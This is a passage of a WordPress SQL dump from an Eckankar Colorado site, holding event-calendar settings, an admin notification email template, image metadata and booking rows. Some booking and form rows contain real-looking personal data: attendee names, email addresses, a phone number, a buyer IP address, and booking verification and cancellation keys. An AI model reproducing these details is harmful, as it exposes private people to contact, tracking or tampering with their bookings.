bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(172262,267433,'mec_event_status','EventScheduled'),(172263,267433,'mec_moved_online_link',''),(172264,267433,'mec_cancelled_reason',''),(172265,267433,'mec_display_cancellation_reason_in_single_page',''),(172266,267433,'protect_children',''),(172267,267433,'passster_activate_global_protection',NULL),(172268,267433,'passster_activate_protection',NULL),(172269,267433,'passster_protection_type','password'),(172270,267433,'boldgrid_hide_page_title','0'),(172271,267433,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(172272,267433,'boldgrid_in_page_containers','1'),(172277,267433,'_dp_original','266604'),(172274,267433,'_thumbnail_id','266605'),(172275,267433,'_oembed_17282f16a653c991eb4e3d6f9f01f652','<iframe title=\"Eckankar Youth: Just Sing HU! - Ancient Spiritual Exercise\" width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/wc9N_g2NolA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(172276,267433,'_oembed_time_17282f16a653c991eb4e3d6f9f01f652','1658850648'),(172278,267433,'_edit_lock','1676662540:2'),(172279,267433,'_edit_last','2'),(172280,267435,'_field_224','Ann'),(172281,267435,'_field_225','Kipper'),(172282,267435,'_field_226','kipperae@gmail.com'),(172283,267435,'_field_227','CO'),(172284,267435,'_field_228','US'),(172285,267435,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(172286,267435,'_form_id','21'),(172287,267435,'_seq_num','159'),(191453,269013,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:900;s:4:\"file\";s:103:\"2023/09/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4a9643f7f3d94a2d4f9082f253a534ee.jpg\";s:8:\"filesize\";i:162102;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4a9643f7f3d94a2d4f9082f253a534ee-348x196.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12847;}s:5:\"large\";a:5:{s:4:\"file\";s:104:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4a9643f7f3d94a2d4f9082f253a534ee-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63426;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4a9643f7f3d94a2d4f9082f253a534ee-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5529;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4a9643f7f3d94a2d4f9082f253a534ee-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40582;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4a9643f7f3d94a2d4f9082f253a534ee-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14707;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4a9643f7f3d94a2d4f9082f253a534ee-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33186;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4a9643f7f3d94a2d4f9082f253a534ee-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23843;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4a9643f7f3d94a2d4f9082f253a534ee-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17336;}s:8:\"tileview\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4a9643f7f3d94a2d4f9082f253a534ee-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16611;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:104:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4a9643f7f3d94a2d4f9082f253a534ee-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120107;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(191452,269013,'_wp_attached_file','2023/09/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4a9643f7f3d94a2d4f9082f253a534ee.jpg'),(172358,267447,'mec_read_more',''),(172359,267447,'mec_more_info',''),(172360,267447,'mec_more_info_title',''),(172361,267447,'mec_more_info_target','_self'),(172362,267447,'mec_cost',''),(172363,267447,'mec_currency','a:0:{}'),(172364,267447,'mec_additional_organizer_ids','a:0:{}'),(172365,267447,'mec_additional_location_ids','a:0:{}'),(172366,267447,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-01-28\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-01-28\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(172367,267447,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(172368,267447,'mec_certain_weekdays','a:0:{}'),(172369,267447,'mec_allday','0'),(172370,267447,'one_occurrence','0'),(172371,267447,'mec_hide_time','0'),(172372,267447,'mec_hide_end_time','0'),(172373,267447,'mec_comment',''),(172374,267447,'mec_timezone','global'),(172375,267447,'mec_countdown_method','global'),(172376,267447,'mec_public','1'),(172377,267447,'mec_start_date','2023-01-28'),(172378,267447,'mec_start_time_hour','1'),(172379,267447,'mec_start_time_minutes','0'),(172380,267447,'mec_start_time_ampm','PM'),(172381,267447,'mec_start_day_seconds','46800'),(172382,267447,'mec_end_date','2023-01-28'),(172383,267447,'mec_end_time_hour','2'),(172384,267447,'mec_end_time_minutes','0'),(172385,267447,'mec_end_time_ampm','PM'),(172386,267447,'mec_end_day_seconds','50400'),(172387,267447,'mec_repeat_status','0'),(172388,267447,'mec_repeat_type',''),(172389,267447,'mec_repeat_interval','1'),(172390,267447,'mec_repeat_end',''),(172391,267447,'mec_repeat_end_at_occurrences',''),(172392,267447,'mec_repeat_end_at_date',''),(172393,267447,'mec_advanced_days','a:0:{}'),(172394,267447,'mec_in_days',''),(172395,267447,'mec_not_in_days',''),(172396,267447,'mec_hourly_schedules','a:0:{}'),(172397,267447,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(172398,267447,'mec_tickets','a:0:{}'),(172399,267447,'mec_fees_global_inheritance','1'),(172400,267447,'mec_fees','a:0:{}'),(172401,267447,'mec_ticket_variations_global_inheritance','1'),(172402,267447,'mec_ticket_variations','a:0:{}'),(172403,267447,'mec_reg_fields_global_inheritance','1'),(172404,267447,'mec_reg_fields','a:0:{}'),(172405,267447,'mec_bfixed_fields','a:0:{}'),(172406,267447,'mec_op','a:0:{}'),(172407,267447,'mec_fields','a:0:{}'),(172408,267447,'mec_event_status','EventScheduled'),(172409,267447,'mec_moved_online_link',''),(172410,267447,'mec_cancelled_reason',''),(172411,267447,'mec_display_cancellation_reason_in_single_page',''),(172412,267447,'boldgrid_hide_page_title','0'),(172413,267447,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(172414,267447,'passster_activate_global_protection',NULL),(172415,267447,'passster_activate_protection',NULL),(172416,267447,'passster_protection_type','password'),(172417,267447,'boldgrid_in_page_containers','1'),(172418,267447,'_dp_original','265240'),(172419,267447,'_edit_lock','1673801098:15'),(172420,267447,'_edit_last','15'),(172421,267447,'_thumbnail_id','266063'),(172422,267449,'protect_children',''),(172423,267449,'mec_color',''),(172424,267449,'mec_location_id','164'),(172425,267449,'mec_dont_show_map','0'),(172426,267449,'mec_organizer_id','1'),(172427,267449,'mec_read_more',''),(172428,267449,'mec_more_info',''),(172429,267449,'mec_more_info_title',''),(172430,267449,'mec_more_info_target','_self'),(172431,267449,'mec_cost',''),(172432,267449,'mec_currency','a:0:{}'),(172433,267449,'mec_additional_organizer_ids','a:0:{}'),(172434,267449,'mec_additional_location_ids','a:0:{}'),(172435,267449,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-12-10\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-12-10\";s:4:\"hour\";s:2:\"12\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(172436,267449,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(172437,267449,'mec_certain_weekdays','a:0:{}'),(172438,267449,'mec_allday','0'),(172439,267449,'one_occurrence','0'),(172440,267449,'mec_hide_time','0'),(172441,267449,'mec_hide_end_time','0'),(172442,267449,'mec_comment',''),(172443,267449,'mec_timezone','global'),(172444,267449,'mec_countdown_method','global'),(172445,267449,'mec_public','1'),(172446,267449,'mec_start_date','2022-12-10'),(172447,267449,'mec_start_time_hour','11'),(172448,267449,'mec_start_time_minutes','0'),(172449,267449,'mec_start_time_ampm','AM'),(172450,267449,'mec_start_day_seconds','39600'),(172451,267449,'mec_end_date','2022-12-10'),(172452,267449,'mec_end_time_hour','12'),(172453,267449,'mec_end_time_minutes','0'),(172454,267449,'mec_end_time_ampm','PM'),(172455,267449,'mec_end_day_seconds','43200'),(172456,267449,'mec_repeat_status','0'),(172457,267449,'mec_repeat_type',''),(172458,267449,'mec_repeat_interval','1'),(172459,267449,'mec_repeat_end',''),(172460,267449,'mec_repeat_end_at_occurrences',''),(172461,267449,'mec_repeat_end_at_date',''),(172462,267449,'mec_advanced_days','a:0:{}'),(172463,267449,'mec_in_days',''),(172464,267449,'mec_not_in_days',''),(172465,267449,'mec_hourly_schedules','a:0:{}'),(172466,267449,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(172467,267449,'mec_tickets','a:0:{}'),(172468,267449,'mec_fees_global_inheritance','1'),(172469,267449,'mec_fees','a:0:{}'),(172470,267449,'mec_ticket_variations_global_inheritance','1'),(172471,267449,'mec_ticket_variations','a:0:{}'),(172472,267449,'mec_reg_fields_global_inheritance','1'),(172473,267449,'mec_reg_fields','a:0:{}'),(172474,267449,'mec_bfixed_fields','a:0:{}'),(172475,267449,'mec_op','a:0:{}'),(172476,267449,'mec_fields','a:0:{}'),(172477,267449,'mec_event_status','EventScheduled'),(172478,267449,'mec_moved_online_link',''),(172479,267449,'mec_cancelled_reason',''),(172480,267449,'mec_display_cancellation_reason_in_single_page',''),(172481,267449,'boldgrid_hide_page_title','0'),(172482,267449,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(172483,267449,'passster_activate_global_protection',NULL),(172484,267449,'passster_activate_protection',NULL),(172485,267449,'passster_protection_type','password'),(172486,267449,'boldgrid_in_page_containers','1'),(172489,267449,'_dp_original','267341'),(172488,267449,'_thumbnail_id','267350'),(172490,267449,'_edit_lock','1668276216:2'),(172491,267449,'_edit_last','2'),(172492,267451,'mec_transaction_id','FDN78743'),(172493,267451,'mec_user_id','1000054'),(172494,267451,'mec_verified','1'),(172495,267451,'mec_verification_key','55a424bff80de1ae074ac734ec43b466'),(172496,267451,'mec_cancellation_key','faf65415b3b74f820b411ce79db2e061'),(172497,267451,'mec_confirmed','1'),(172498,267451,'mec_event_id','267408'),(172499,267451,'mec_date','1668335400:1668382200'),(172500,267451,'mec_ticket_id',',1,'),(172501,267451,'mec_booking_time','2022-11-13 10:26:38'),(172502,267451,'mec_all_dates','a:0:{}'),(172503,267451,'mec_other_dates','a:0:{}'),(172504,267451,'mec_attention_time','1668335400:1668382200'),(172505,267451,'mec_attention_time_start','1668335400'),(172506,267451,'mec_attention_time_end','1668382200'),(172507,267451,'mec_book_date_submit','20221113102638'),(172508,267451,'mec_booking_location','129'),(172509,267451,'mec_ticket_price_1','0'),(172510,267451,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"freedroger9@gmail.com\";s:4:\"name\";s:11:\"Roger Freed\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"4.4.204.170\";}}'),(172511,267451,'mec_price','0'),(172512,267451,'mec_gateway','MEC_gateway_free'),(172513,267451,'mec_gateway_label','Free'),(177386,268006,'original-file','2023/02/cropped-favicon-g3-updraft-pre-smush-original.png'),(179374,268208,'mec_timezone','global'),(179360,268208,'mec_more_info_title',''),(177400,268015,'_wp_attached_file','2023/02/outlook-online-4-for-adding-domain.png'),(177401,268015,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1577;s:6:\"height\";i:741;s:4:\"file\";s:46:\"2023/02/outlook-online-4-for-adding-domain.png\";s:8:\"filesize\";i:44023;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:46:\"outlook-online-4-for-adding-domain-300x141.png\";s:5:\"width\";i:300;s:6:\"height\";i:141;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9465;}s:5:\"large\";a:5:{s:4:\"file\";s:47:\"outlook-online-4-for-adding-domain-1024x481.png\";s:5:\"width\";i:1024;s:6:\"height\";i:481;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:58588;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:46:\"outlook-online-4-for-adding-domain-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5163;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:46:\"outlook-online-4-for-adding-domain-768x361.png\";s:5:\"width\";i:768;s:6:\"height\";i:361;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:39476;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:46:\"outlook-online-4-for-adding-domain-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14908;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:46:\"outlook-online-4-for-adding-domain-474x324.png\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25314;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:46:\"outlook-online-4-for-adding-domain-391x260.png\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18825;}s:8:\"tileview\";a:5:{s:4:\"file\";s:46:\"outlook-online-4-for-adding-domain-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:21170;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:47:\"outlook-online-4-for-adding-domain-1536x722.png\";s:5:\"width\";i:1536;s:6:\"height\";i:722;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:96846;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(193855,269224,'_field_656','The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1200  130 pm - Zoom'),(193854,269224,'_field_651','(303) 588-1385'),(172540,267478,'_edit_lock','1695008631:2'),(172541,267478,'_edit_last','2'),(176798,267895,'boldgrid_in_page_containers','1'),(176790,267895,'passster_activate_global_protection',NULL),(176791,267895,'passster_activate_protection',NULL),(176792,267895,'passster_protection_type','password'),(176795,267895,'_dp_original','266318'),(176794,267895,'_thumbnail_id','265135'),(176796,267895,'_edit_lock','1693156936:2'),(176797,267895,'_edit_last','2'),(172524,267409,'original-file','2022/11/hilltop-walking-1-updraft-pre-smush-original.jpg'),(172525,267409,'smush-complete','1'),(172526,267409,'smush-info','The file was compressed from 120.23 KB to 113.18 KB saving 5.86 percent using 